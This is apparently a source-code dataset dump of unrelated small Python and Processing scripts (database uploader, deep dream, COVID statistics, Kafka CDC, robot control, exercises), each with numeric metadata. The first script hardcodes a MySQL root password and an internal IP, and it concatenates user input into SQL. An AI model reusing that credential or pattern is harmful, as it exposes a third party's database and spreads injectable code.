def connetc2mysql():
try:
conn = pymysql.connect(
host = '10.15.50.100',
port = 3306,
user= 'root',
password = 'Zhaolab@C809!!',
db = 'CORdbPro',
charset = 'utf8',
use_unicode=True)
except Exception as e:
print(e)
else:
print("connect seccess")
return(conn)
def create_table(cur, conn, tablename):
cur.execute("CREATE table "
+ tablename
+ "(id INT PRIMARY KEY AUTO_INCREMENT,"
+ "filename VARCHAR(100),"
+ "data MEDIUMBLOB);")
conn.commit()
def insert_data(cur, conn, infile, tablename):
with open(infile, 'rb') as fopen:
fread = fopen.read()
content = pymysql.Binary(fread)
filename = os.path.basename(infile)
#filename = filename.split('-')[0]
insert_sql="INSERT INTO "+tablename+" (filename, data) VALUES (%s, %s)"
if cur.execute(insert_sql , (filename, content)):
conn.commit()
else:
print('writed failed', cur.error)
def main():
indir = sys.argv[1]
conn = connetc2mysql()
cur = conn.cursor()
create_table(cur, conn, indir)
for infile in os.listdir(indir):
infile = os.path.join(indir, infile)
insert_data(cur, conn, infile, indir)
if __name__ == "__main__":
main()
| 19.548387
| 73
| 0.660066
| 162
| 1,212
| 4.839506
| 0.537037
| 0.044643
| 0.035714
| 0.045918
| 0.058673
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025278
| 0.183993
| 1,212
| 61
| 74
| 19.868852
| 0.767442
| 0.037954
| 0
| 0.088889
| 0
| 0
| 0.183147
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088889
| false
| 0.022222
| 0.066667
| 0
| 0.155556
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
757fe53371e91dc422879bc5ad40243b0d086700
| 2,478
|
py
|
Python
|
start_simple_test.py
|
rartino/python-optimade-server
|
84457091c7ec0db52a7e034bb6a7cd4bcbdd4e57
|
[
"MIT"
] | null | null | null |
start_simple_test.py
|
rartino/python-optimade-server
|
84457091c7ec0db52a7e034bb6a7cd4bcbdd4e57
|
[
"MIT"
] | null | null | null |
start_simple_test.py
|
rartino/python-optimade-server
|
84457091c7ec0db52a7e034bb6a7cd4bcbdd4e57
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright 2019 Rickard Armiento
#
# This file is part of a Python candidate reference implementation of
# the optimade API [https://www.optimade.org/]
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
'''
This is part of a Python candidate reference implementation of the
optimade API [https://www.optimade.org/].
This program runs a simple test query against the example_sqlite3 backend.
'''
from __future__ import print_function
import os, sys
from pprint import pprint
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)),'src'))
from parse import parse_optimade_filter
if __name__ == "__main__":
import backends.example_sqlite3 as backend
backend.initialize()
# This represents the query being received (later to be received via a web URL query)
tables = ["structures"]
response_fields = ["id", "chemical_formula", "elements"]
if len(sys.argv) >= 2:
input_string = 'filter='+sys.argv[1]
else:
input_string = 'filter=elements="Ga,Ti" AND (nelements=3 OR nelements=2)'
response_limit = 50
filter_ast = parse_optimade_filter(input_string)
print("==== FILTER STRING PARSE RESULT:")
pprint(filter_ast)
print("====")
result = backend.execute_query(tables, response_fields, response_limit, filter_ast, debug=True)
print("==== END RESULT")
pprint(list(result))
print("===============")
backend.close()
| 34.901408
| 99
| 0.726796
| 349
| 2,478
| 5.060172
| 0.495702
| 0.04983
| 0.00906
| 0.010193
| 0.092865
| 0.092865
| 0.092865
| 0.092865
| 0.092865
| 0.092865
| 0
| 0.005914
| 0.181195
| 2,478
| 70
| 100
| 35.4
| 0.864465
| 0.587974
| 0
| 0
| 0
| 0
| 0.178499
| 0.023327
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.208333
| 0
| 0.208333
| 0.333333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7581ce931238117bdcd49cbe392056bdbbeb384d
| 2,609
|
py
|
Python
|
examples/deep_dream.py
|
vacancy/LibNeuralArt
|
fb7696877ac2bf08e1e4e46caec9ccd14ce4797c
|
[
"MIT"
] | 1
|
2022-03-09T14:38:01.000Z
|
2022-03-09T14:38:01.000Z
|
examples/deep_dream.py
|
vacancy/LibNeuralArt
|
fb7696877ac2bf08e1e4e46caec9ccd14ce4797c
|
[
"MIT"
] | null | null | null |
examples/deep_dream.py
|
vacancy/LibNeuralArt
|
fb7696877ac2bf08e1e4e46caec9ccd14ce4797c
|
[
"MIT"
] | null | null | null |
import os
import argparse
import cv2
import numpy as np
import tensorflow as tf
from nart import opr, aopr
from nart.model import VGG16
from nart.logconf import logger
LEARNING_RATE = 1.5
JITTER = 32
as_netin = lambda x: x[np.newaxis, :]
def make_step(sess, net, end):
''' iter only one step, providing end '''
# random draw ox, oy
ox, oy = np.random.randint(-JITTER, JITTER+1, 2)
img = sess.run(net['input'])[0]
img = np.roll(np.roll(img, ox, 1), oy, 0) # apply jitter shift
# compute the gradient
# one shuold note that we are actually use L2 loss for an activation map to
# to compute the gradient for the input
sess.run(net['input'].assign(as_netin(img)))
target = net[end]
loss = 0.5 * tf.reduce_mean(tf.pow(target, 2))
grad = tf.gradients(loss, [net['input']])[0]
grad = sess.run(grad)[0]
# apply gradient ascent, with normalized gradient
img += LEARNING_RATE / np.abs(grad).mean() * grad
img = np.clip(img, 0, 255)
img = np.roll(np.roll(img, -ox, 1), -oy, 0) # unshift image
sess.run(net['input'].assign(as_netin(img)))
def main(args):
# read the image, and load the network
img = cv2.imread(args.image_path)
net = VGG16(args.weight_path, img.shape[0], img.shape[1])
os.makedirs(args.output_path, exist_ok=True)
# initialize the session
sess = tf.Session()
sess.run(tf.initialize_all_variables())
sess.run(net['input'].assign(as_netin(img)))
for i in range(0, args.nr_iters+1):
if i != 0:
make_step(sess, net, end=args.end)
# save the result image every ``args.save_step'' iterations
if i % args.save_step == 0:
current_img = sess.run(net['input'])[0]
output_path = os.path.join(args.output_path, 'epoch_{:04d}.png'.format(i))
cv2.imwrite(output_path, current_img)
logger.info('epoch {}: image written to {}'.format(i, output_path))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-w', dest='weight_path', required=True, help='weight path')
parser.add_argument('-i', dest='image_path', required=True, help='input image path')
parser.add_argument('-o', dest='output_path', required=True, help='output directory')
parser.add_argument('-e', '--end', dest='end', default='conv5_3', help='end')
parser.add_argument('--iter', dest='nr_iters', type=int, default=100, help='number of iterations')
parser.add_argument('--save-step', dest='save_step', type=int, default=5, help='save step (in iteration)')
main(parser.parse_args())
| 33.448718
| 110
| 0.651974
| 400
| 2,609
| 4.1375
| 0.355
| 0.029607
| 0.061631
| 0.045317
| 0.129909
| 0.108157
| 0.085196
| 0.085196
| 0.029003
| 0.029003
| 0
| 0.020496
| 0.19586
| 2,609
| 77
| 111
| 33.883117
| 0.768351
| 0.148333
| 0
| 0.0625
| 0
| 0
| 0.118821
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.166667
| 0
| 0.208333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75822d824753f70d530800d691025e523bb8dcb9
| 1,079
|
py
|
Python
|
5.py
|
niharikasingh/aoc2018
|
21d430d393321e6066eca22d7c6b49e5eb42d756
|
[
"MIT"
] | null | null | null |
5.py
|
niharikasingh/aoc2018
|
21d430d393321e6066eca22d7c6b49e5eb42d756
|
[
"MIT"
] | null | null | null |
5.py
|
niharikasingh/aoc2018
|
21d430d393321e6066eca22d7c6b49e5eb42d756
|
[
"MIT"
] | null | null | null |
import re
text = ''
with open('5input1.txt', 'r') as ifile:
text = ifile.read().strip()
def find_length(text):
text = list(text)
t0 = ''
t1 = ''
restart = True
while (restart):
restart = False
loop = len(text) - 1
i = 0
# print(text)
while (i < loop):
# print(i)
t0 = text[i]
t1 = text[i+1]
if (t0 != t1) and (t0.upper() == t1.upper()):
restart = True
# print("removing", t0, t1)
del text[i]
del text[i]
loop -= 2
i -= 1
else:
i += 1
# print(''.join(text))
return len(text)
current_min = len(text)
for a in list('abcdefghijklmnopqrstuvwxyz'):
to_remove = a + a.upper()
new_text = re.sub('[' + to_remove + ']', '', text)
# print("removing:", to_remove, "result:", new_text)
new_min_to_test = find_length(new_text)
# print(a, new_min_to_test)
current_min = min(current_min, new_min_to_test)
print(current_min)
| 25.690476
| 57
| 0.489342
| 136
| 1,079
| 3.727941
| 0.360294
| 0.039448
| 0.047337
| 0.071006
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026316
| 0.36608
| 1,079
| 41
| 58
| 26.317073
| 0.714912
| 0.133457
| 0
| 0.125
| 0
| 0
| 0.043103
| 0.028017
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0.03125
| 0
| 0.09375
| 0.03125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7584210fe482f4212d8e7879d8d01a58011b39a4
| 1,122
|
py
|
Python
|
venv/Lib/site-packages/pyo/examples/22-events/08-function-calls.py
|
mintzer/pupillometry-rf-back
|
cfa86fa984a49dce0123798f8de5b838c02e10d5
|
[
"CC-BY-4.0"
] | null | null | null |
venv/Lib/site-packages/pyo/examples/22-events/08-function-calls.py
|
mintzer/pupillometry-rf-back
|
cfa86fa984a49dce0123798f8de5b838c02e10d5
|
[
"CC-BY-4.0"
] | null | null | null |
venv/Lib/site-packages/pyo/examples/22-events/08-function-calls.py
|
mintzer/pupillometry-rf-back
|
cfa86fa984a49dce0123798f8de5b838c02e10d5
|
[
"CC-BY-4.0"
] | null | null | null |
"""
08-function-calls.py - Using custom algorithms with python function calls.
**EventCall** ::
EventCall(function, *args, occurrences=inf, stopEventsWhenDone=True)
EventCall calls a function, with any number of arguments (\*args) and uses
its return value for the given parameter. The example below use a function
from the random module, *randrange*, with arguments and a user-defined
function, without argument, to create a rising, then falling, amplitude curve.
"""
import random
from pyo import *
s = Server().boot()
db = -30
dir = 1
def riseFallAmp():
"Rises and falls amplitude between -30 and -3 dB, 1 db at the time."
global db, dir
db += dir
if db >= -3:
dir = -1
elif db < -30:
dir = 1
return db
# Midi notes are chosen randomly with a function from the random module,
# while the amplitude change according to the riseFallAmp function's output.
e = Events(
midinote=EventCall(random.randrange, 48, 72, 3),
beat=1 / 4.0,
db=EventCall(riseFallAmp),
attack=0.001,
decay=0.05,
sustain=0.5,
release=0.005,
).play()
s.gui(locals())
| 22.897959
| 78
| 0.680036
| 166
| 1,122
| 4.596386
| 0.572289
| 0.035387
| 0.034076
| 0.04194
| 0.073395
| 0.073395
| 0
| 0
| 0
| 0
| 0
| 0.039773
| 0.215686
| 1,122
| 48
| 79
| 23.375
| 0.827273
| 0.606952
| 0
| 0.083333
| 0
| 0
| 0.13253
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.083333
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75858d15ba85e9ff5541366ae7ab4ccf2759852d
| 2,048
|
py
|
Python
|
main.py
|
Andrey22/Python_Lesson2_Neural_University
|
014f8da8e3002e081aba3fb1ce9dcf56e5af1d57
|
[
"MIT"
] | null | null | null |
main.py
|
Andrey22/Python_Lesson2_Neural_University
|
014f8da8e3002e081aba3fb1ce9dcf56e5af1d57
|
[
"MIT"
] | null | null | null |
main.py
|
Andrey22/Python_Lesson2_Neural_University
|
014f8da8e3002e081aba3fb1ce9dcf56e5af1d57
|
[
"MIT"
] | null | null | null |
'''
Задача 1
Вывести на экран циклом пять строк из нулей, причем каждая строка должна быть пронумерована.
'''
print ('Task1')
for i in range(5):
i+=1
print(i,'00000')
'''
Задача 2
Пользователь в цикле вводит 10 цифр. Найти количество введеных пользователем цифр 5.
'''
print ('Task2')
count=0
for i in range(10):
number = int(input('Введите 1 из 10 цифр'))
if number==5:
count+=1
print ('Количество цифр 5 равно', count)
'''
Задача 3
Найти сумму ряда чисел от 1 до 100. Полученный результат вывести на экран.
'''
print ('Task3')
countnum=0
for i in range(101):
countnum+=i
print (countnum)
'''
Задача 4
Найти произведение ряда чисел от 1 до 10. Полученный результат вывести на экран.
'''
print ('Task4')
countnum = 1
for i in range(1,11,1):
countnum*=i
print (countnum)
'''
Задача 5
Вывести цифры числа на каждой строчке.
'''
print ('Task5')
number1 = int(input('Введите число'))
while number1>0:
x = number1
x%=10
print (x)
number1//=10
'''
Задача 6
Найти сумму цифр числа.
'''
print ('Task6')
number1 = int(input('Введите число'))
sum=0
while number1>0:
x = number1
x%=10
sum+=x
number1//=10
print (sum)
'''
Задача 7
Найти произведение цифр числа.
'''
print ('Task7')
number1 = int(input('Введите число'))
multi=1
while number1>0:
x = number1
x%=10
multi*=x
number1//=10
print (multi)
'''
Задача 8
Дать ответ на вопрос: есть ли среди цифр числа 5?
'''
print ('Task8')
number = int(input('Введите число'))
while number>0:
x = number
x%=10
number //= 10
if x == 5:
print ('Yes')
break
else:
print ('No')
'''
Задача 9
Найти максимальную цифру в числе
'''
print ('Task9')
number = int(input('Введите число'))
max=0
while number>0:
x = number
x%=10
number //= 10
if x > max:
max=x
print (max)
'''
Задача 10
Найти количество цифр 5 в числе
'''
print ('Task10')
count=0
number = int(input('Введите число'))
while number>0:
x = number
x%=10
number //= 10
if x == 5:
count+=1
print (count)
| 17.210084
| 92
| 0.631348
| 312
| 2,048
| 4.144231
| 0.301282
| 0.04331
| 0.081207
| 0.092807
| 0.399072
| 0.232792
| 0.174014
| 0.118329
| 0.118329
| 0.118329
| 0
| 0.068225
| 0.227051
| 2,048
| 119
| 93
| 17.210084
| 0.748579
| 0.049316
| 0
| 0.493506
| 0
| 0
| 0.135316
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.272727
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7586aaf36cfc9aa4004d62afa11753f68be84c72
| 5,351
|
py
|
Python
|
PHASE_2/Application_SourceCode/backend/covid_utils.py
|
vicinx3/disease-outbreak
|
035e78875c374e2cdbd4720a4f2ed1370f63a88c
|
[
"MIT"
] | null | null | null |
PHASE_2/Application_SourceCode/backend/covid_utils.py
|
vicinx3/disease-outbreak
|
035e78875c374e2cdbd4720a4f2ed1370f63a88c
|
[
"MIT"
] | null | null | null |
PHASE_2/Application_SourceCode/backend/covid_utils.py
|
vicinx3/disease-outbreak
|
035e78875c374e2cdbd4720a4f2ed1370f63a88c
|
[
"MIT"
] | null | null | null |
import requests
import datetime
from db import convert_code
from pycountry_convert import country_name_to_country_alpha2
from pprint import pprint
import json
url = r'https://pomber.github.io/covid19/timeseries.json'
response = requests.get(url)
if response.status_code != 200:
print("Failed to connect to pomber")
def convert_country(country):
preset = {
'Congo (Brazzaville)': 'CG',
'Congo (Kinshasa)': 'CD',
'Cote d\'Ivoire': 'CI',
'Holy See': 'VA',
'Korea, South': 'KR',
'Taiwan*': 'TW',
'US': 'US',
'West Bank and Gaza': 'PS',
'Kosovo': 'XK',
'Burma': 'MM',
}
if country in preset:
return preset[country]
try:
return country_name_to_country_alpha2(country)
except Exception:
return False
result = response.json()
content = {}
for country in result:
code = convert_country(country)
if code:
content[code] = result[country]
def get_date(index):
date_str = content['AU'][index]['date']
return datetime.datetime.strptime(date_str, r'%Y-%m-%d')
first_date = get_date(0)
last_date = get_date(-1)
def get_last_day():
delta = last_date - first_date
return delta.days
total = []
for i in range(0, get_last_day() + 1):
total.append({
'confirmed': 0,
'recovered': 0,
'deaths': 0
})
for country in content:
for category in ['confirmed', 'recovered', 'deaths']:
total[i][category] += content[country][i][category]
######################
# Functions
######################
def get_codes():
return list(content.keys())
def get_countries():
result = {}
for code in content:
result[code] = convert_code(code)
return result
def get_slider_marks():
marks = []
template = r'%d %b'
marks.append({'value': 0, 'label': first_date.strftime(template)})
marks.append({'value': get_last_day(), 'label': last_date.strftime(template)})
for i in range(0, get_last_day() - 5, 14):
current_date = first_date + datetime.timedelta(days=i)
marks.append({'value': i, 'label': current_date.strftime(template)})
return marks
def get_cases_by_country_and_category(date, category, daily):
result = {}
for country in content:
if daily:
delta = content[country][date][category]
if date > 0:
delta -= content[country][date - 1][category]
result[country] = delta
else:
result[country] = content[country][date][category]
return result
def get_cases_by_country(date, prettify=False):
def calc_mortality(deaths, recovered):
total = deaths + recovered
return round(deaths * 100 / total, 2) if total > 0 else 0
result = []
for country in content:
current = content[country][date]
confirmed = current['confirmed']
recovered = current['recovered']
deaths = current['deaths']
mortality = calc_mortality(deaths, recovered)
result.append({
'country': convert_code(country),
'confirmed': confirmed,
'recovered': recovered,
'deaths': deaths,
'mortality': mortality
})
result.insert(0, {
'country': 'All countries',
'confirmed': total[date]['confirmed'],
'recovered': total[date]['recovered'],
'deaths': total[date]['deaths'],
'mortality': calc_mortality(total[date]['deaths'], total[date]['recovered'])
})
return result
def get_cases_by_day(daily):
result = {}
for category in ['confirmed', 'recovered', 'deaths']:
temp = []
for i in range(0, get_last_day() + 1):
current_date = first_date + datetime.timedelta(days=i)
if daily:
value = total[i][category]
if i > 0:
value -= total[i-1][category]
else:
value = total[i][category]
temp.append({
'date': current_date.strftime(r'%Y-%m-%d'),
'value': value
})
result[category] = temp
return result
def get_comparator_graph_data(country):
standard = {}
for category in ['confirmed', 'recovered', 'deaths']:
standard[category] = []
for i in range(0, get_last_day() + 1):
value = total[i][category] if country == '' else content[country][i][category]
standard[category].append({
'date': i,
'value': value
})
trajectory = []
for i in range(0, get_last_day() + 1):
if country == '':
get = lambda x: total[x]['confirmed']
else:
get = lambda x: content[country][x]['confirmed']
total_cases = get(i)
def daily_increase(j):
return get(j) - get(j-1) if j > 0 else get(j)
j = i
new_cases = 0
while (j >= 0 and i - j < 7):
new_cases += daily_increase(j)
j -= 1
new_cases = round(new_cases / (i - j))
if new_cases > 0:
trajectory.append({
'total': total_cases,
'new': new_cases
})
return {'standard': standard, 'trajectory': trajectory}
| 27.869792
| 90
| 0.555971
| 611
| 5,351
| 4.743044
| 0.214403
| 0.018634
| 0.024155
| 0.018979
| 0.182885
| 0.123879
| 0.068323
| 0.068323
| 0.031746
| 0
| 0
| 0.011544
| 0.303868
| 5,351
| 192
| 91
| 27.869792
| 0.766443
| 0.001682
| 0
| 0.219355
| 0
| 0.006452
| 0.106873
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.077419
| false
| 0
| 0.03871
| 0.012903
| 0.206452
| 0.012903
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
758800528ccfe0918aa562d413d55854aa70f801
| 2,398
|
py
|
Python
|
cdc_kafka/parsed_row.py
|
woodlee/sqlserver-cdc-to-kafka
|
602c17432a87c1aaee94dc6c971cde8496314fda
|
[
"MIT"
] | 10
|
2020-04-09T09:32:54.000Z
|
2021-10-04T09:20:59.000Z
|
cdc_kafka/parsed_row.py
|
woodlee/sqlserver-cdc-to-kafka
|
602c17432a87c1aaee94dc6c971cde8496314fda
|
[
"MIT"
] | 4
|
2019-10-04T14:15:32.000Z
|
2020-05-13T18:48:58.000Z
|
cdc_kafka/parsed_row.py
|
woodlee/sqlserver-cdc-to-kafka
|
602c17432a87c1aaee94dc6c971cde8496314fda
|
[
"MIT"
] | 6
|
2019-11-11T18:01:00.000Z
|
2021-06-09T09:49:57.000Z
|
import datetime
from functools import total_ordering
from typing import Tuple, Any, Dict, Optional
from . import change_index
@total_ordering
class ParsedRow(object):
def __init__(self, table_fq_name: str, row_kind: str, operation_name: str, event_db_time: datetime.datetime,
change_idx: Optional[change_index.ChangeIndex], ordered_key_field_values: Tuple[Any],
destination_topic: str, avro_key_schema_id: int, avro_value_schema_id: int,
key_dict: Dict[str, Any], value_dict: Dict[str, Any]) -> None:
self.table_fq_name: str = table_fq_name
self.row_kind: str = row_kind
self.operation_name: str = operation_name
self.event_db_time: datetime.datetime = event_db_time
self.change_idx: Optional[change_index.ChangeIndex] = change_idx
self.ordered_key_field_values: Tuple = ordered_key_field_values
self.destination_topic: str = destination_topic
self.avro_key_schema_id: int = avro_key_schema_id
self.avro_value_schema_id: int = avro_value_schema_id
self.key_dict: Dict[str, Any] = key_dict
self.value_dict: Dict[str, Any] = value_dict
def __eq__(self, other) -> bool:
if isinstance(other, ParsedRow):
return (self.table_fq_name, self.value_dict) == (other.table_fq_name, other.value_dict)
return False
def __lt__(self, other: 'ParsedRow') -> bool:
if other is None:
return False
if isinstance(other, ParsedRow):
self_tuple = (
self.change_idx or change_index.LOWEST_CHANGE_INDEX,
self.event_db_time,
self.table_fq_name
)
other_tuple = (
other.change_idx or change_index.LOWEST_CHANGE_INDEX,
other.event_db_time,
other.table_fq_name
)
if self_tuple != other_tuple:
return self_tuple < other_tuple
# I know it seems backwards, but it's because we read snapshot rows backwards by their PKs:
return self.ordered_key_field_values > other.ordered_key_field_values
raise Exception(f'Cannot compare ParsedRow to object of type "{type(other)}"')
def __repr__(self) -> str:
return f'ParsedRow from {self.table_fq_name} of kind {self.row_kind}, change index {self.change_idx}'
| 42.070175
| 112
| 0.662219
| 319
| 2,398
| 4.61442
| 0.244514
| 0.059783
| 0.059783
| 0.050951
| 0.343071
| 0.194973
| 0.091033
| 0.052989
| 0
| 0
| 0
| 0
| 0.261885
| 2,398
| 56
| 113
| 42.821429
| 0.831638
| 0.037114
| 0
| 0.088889
| 0
| 0.022222
| 0.068487
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088889
| false
| 0
| 0.088889
| 0.022222
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75893c568f3d251f68a9d4ffb2aa6e88611b92ae
| 446
|
py
|
Python
|
mikeio/xyz.py
|
rhaDHI/mikeio
|
eb24503d935df969eac32569a41d223d6f0e2edf
|
[
"BSD-3-Clause"
] | 65
|
2019-11-27T13:42:52.000Z
|
2022-03-31T11:41:56.000Z
|
mikeio/xyz.py
|
rhaDHI/mikeio
|
eb24503d935df969eac32569a41d223d6f0e2edf
|
[
"BSD-3-Clause"
] | 178
|
2019-12-17T19:43:04.000Z
|
2022-03-31T06:54:06.000Z
|
mikeio/xyz.py
|
rhaDHI/mikeio
|
eb24503d935df969eac32569a41d223d6f0e2edf
|
[
"BSD-3-Clause"
] | 41
|
2019-12-17T18:21:04.000Z
|
2022-03-16T12:15:40.000Z
|
import pandas as pd
def read_xyz(filename):
# try:
df = pd.read_csv(filename, sep="\t", header=None)
if df.shape[1] == 1:
df = pd.read_csv(filename, sep=" ", header=None)
ncol = df.shape[1]
names = ["x", "y", "z", "name"]
df.columns = names[0:ncol]
return df
def dataframe_to_xyz(self, filename):
self.to_csv(filename, sep="\t", header=False, index=False)
pd.DataFrame.to_xyz = dataframe_to_xyz
| 17.84
| 62
| 0.61435
| 70
| 446
| 3.785714
| 0.457143
| 0.124528
| 0.158491
| 0.083019
| 0.271698
| 0.166038
| 0
| 0
| 0
| 0
| 0
| 0.011494
| 0.219731
| 446
| 24
| 63
| 18.583333
| 0.75
| 0.008969
| 0
| 0
| 0
| 0
| 0.027273
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.083333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
758a746fea53069cc01b12087b264b7e85fe4798
| 534
|
py
|
Python
|
chassis/rechteck.py
|
ThePBone/RobomasterCheatsheet
|
14089f4a20d72700e653e291137a4cbc9d13b694
|
[
"MIT"
] | 4
|
2022-02-08T21:53:57.000Z
|
2022-03-27T21:28:20.000Z
|
chassis/rechteck.py
|
ThePBone/RobomasterCheatsheet
|
14089f4a20d72700e653e291137a4cbc9d13b694
|
[
"MIT"
] | null | null | null |
chassis/rechteck.py
|
ThePBone/RobomasterCheatsheet
|
14089f4a20d72700e653e291137a4cbc9d13b694
|
[
"MIT"
] | null | null | null |
from robomaster import robot
import time
ep_robot = robot.Robot()
xy_speed = 1/2 # m/s
z_speed = 90/2 # m/s
if __name__ == '__main__':
#ep_robot.initialize(conn_type="sta", sn="3JKDH6U0011J02")
ep_robot.initialize(conn_type="ap")
ep_chassis = ep_robot.chassis
for i in range(4):
# 1 Meter nach vorne
ep_chassis.move(1, 0, 0, xy_speed).wait_for_completed()
time.sleep(50)
# 90° Drehung
ep_chassis.move(0, 0, 90, 0, z_speed).wait_for_completed()
ep_robot.close()
| 24.272727
| 66
| 0.640449
| 85
| 534
| 3.729412
| 0.494118
| 0.11041
| 0.018927
| 0.132492
| 0.157729
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066015
| 0.234082
| 534
| 21
| 67
| 25.428571
| 0.706601
| 0.177903
| 0
| 0
| 0
| 0
| 0.023095
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.153846
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
758afd7cbb115376a34da86e1eeaae56905b6dcf
| 447
|
pyde
|
Python
|
processing/Mod. 6/sketch_6_1_l37/sketch_6_1_l37.pyde
|
nanam0rgana/2019-fall-polytech-cs
|
1a31acb3cf22edc930318dec17324b05dd7788d5
|
[
"MIT"
] | null | null | null |
processing/Mod. 6/sketch_6_1_l37/sketch_6_1_l37.pyde
|
nanam0rgana/2019-fall-polytech-cs
|
1a31acb3cf22edc930318dec17324b05dd7788d5
|
[
"MIT"
] | null | null | null |
processing/Mod. 6/sketch_6_1_l37/sketch_6_1_l37.pyde
|
nanam0rgana/2019-fall-polytech-cs
|
1a31acb3cf22edc930318dec17324b05dd7788d5
|
[
"MIT"
] | null | null | null |
def setup ():
size (500, 500)
smooth ()
background (255)
noStroke ()
colorMode(HSB)
flug = bool(True)
i=0
j=0
def draw ():
global i, j, flug
if(flug):
for i in range (10):
for j in range (5):
fill (10, random (0, 255) , random (10, 250))
rect(j*40+50 , i*40+50 , 35, 35)
rect ((10-j)*40+10 , i*40+50 , 35, 35)
def mouseClicked ():
flug = not flug
| 22.35
| 61
| 0.478747
| 68
| 447
| 3.147059
| 0.485294
| 0.056075
| 0.046729
| 0.065421
| 0.084112
| 0
| 0
| 0
| 0
| 0
| 0
| 0.180851
| 0.369128
| 447
| 19
| 62
| 23.526316
| 0.578014
| 0
| 0
| 0
| 0
| 0
| 0
